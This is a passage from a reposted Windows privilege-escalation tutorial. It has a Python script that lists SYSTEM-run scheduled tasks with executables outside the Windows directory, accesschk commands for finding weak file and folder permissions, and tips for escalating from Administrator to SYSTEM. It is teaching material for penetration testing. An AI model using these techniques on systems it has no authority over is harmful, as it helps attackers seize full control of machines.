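    """One {field: value} dict per task. schtasks prints 'HostName:' first for
    every task, so that line starts a new record."""
    tasks, cur = [], None
    for line in text.splitlines():
        m = _FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "HostName":
            cur = {}
            tasks.append(cur)
        if cur is not None:
            cur[key] = value
    return tasks


def executable_of(task_to_run):
    """Program path from 'Task To Run': the quoted part, or the first token,
    with %windir%/%SystemRoot% expanded (case-insensitively)."""
    s = task_to_run.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end > 0 else s[1:]
    else:
        exe = s.split()[0] if s else ""
    for var, val in ENV.items():
        exe = re.sub(re.escape(var), lambda _m, v=val: v, exe, flags=re.IGNORECASE)
    return exe


def candidate_tasks(tasks):
    """[(name, run-as, exe, directory)] for enabled tasks running as a
    privileged account from outside %SystemRoot% (where low-privileged users
    rarely hold write access, so those paths are not worth checking first)."""
    windir = ntpath.normcase(ENV["%windir%"]) + "\\"
    hits = []
    for t in tasks:
        run_as = t.get("Run As User", "").upper()
        if run_as not in PRIVILEGED or t.get("Scheduled Task State") != "Enabled":
            continue
        exe = executable_of(t.get("Task To Run", ""))
        if not exe or ntpath.normcase(exe).startswith(windir):
            continue
        hits.append((t.get("TaskName", "?"), t["Run As User"], exe, ntpath.dirname(exe)))
    return hits


# Constructed capture: the article's LogGrabberTFTP task plus a stock task.
SAMPLE = r"""
HostName:                             B33F
TaskName:                             LogGrabberTFTP
Next Run Time:                        2/19/2014 9:00:00 AM
Status:                               Ready
Author:                               B33F\b33f
Task To Run:                          E:\GrabLogs\tftp.exe 10.1.1.99 GET log.out E:\GrabLogs\Logs\log.txt
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Daily
Start Time:                           9:00:00 AM

HostName:                             B33F
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Status:                               Ready
Task To Run:                          %windir%\system32\defrag.exe -c
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
"""

if __name__ == "__main__":
    for name, run_as, exe, folder in candidate_tasks(parse_schtasks_list(SAMPLE)):
        print(f"{name} runs {exe} as {run_as}; check write access to {folder}")
```

Tasks whose executable lives under C:\Program Files are skipped only by the Windows-directory filter here, so they are reported too; that is intentional, since third-party installers regularly create world-writable directories there.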

[screenshot not reproduced]

These two examples should give you an idea of the kind of vulnerabilities to look for when considering file/folder permissions. You will need to take the time to check the binpaths of all Windows services, scheduled tasks and startup items.

As we have seen, accesschk is the tool of choice. Before finishing, I want to give you some final pointers on using it.

```
# When executing any of the sysinternals tools for the first time the user will be presented with a GUI
# pop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag
# to automatically accept the EULA.
accesschk.exe /accepteula ... ... ...

# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
```

Final thoughts

This guide is meant to be the "fundamentals" of Windows privilege escalation. If you want to truly master the subject you will need to put in a lot of work and research. As with every aspect of penetration testing, enumeration is key: the more you know about the target, the more avenues of attack you have and the higher your success rate.

Also remember that sometimes you will end up escalating to Administrator rather than SYSTEM. Going from Administrator to SYSTEM is not a problem, provided your shell is a high-integrity (UAC-elevated) one: you can always reconfigure a service or create a scheduled task that runs with SYSTEM-level privileges.

Now go pop some SYSTEM shells!

Original article: https://fuzzysecurity.com/tutorials/16.html

Originally posted on the WeChat public account "Ots安全" under the title "Windows 权限提升基础知识" (Windows Privilege Escalation Fundamentals).

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts none. Questions may be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Posted by admin on 2024-05-19. If you repost, please keep this link (CN-SEC 中文网, with thanks to the original author): http://cn-sec.com/archives/2755663.html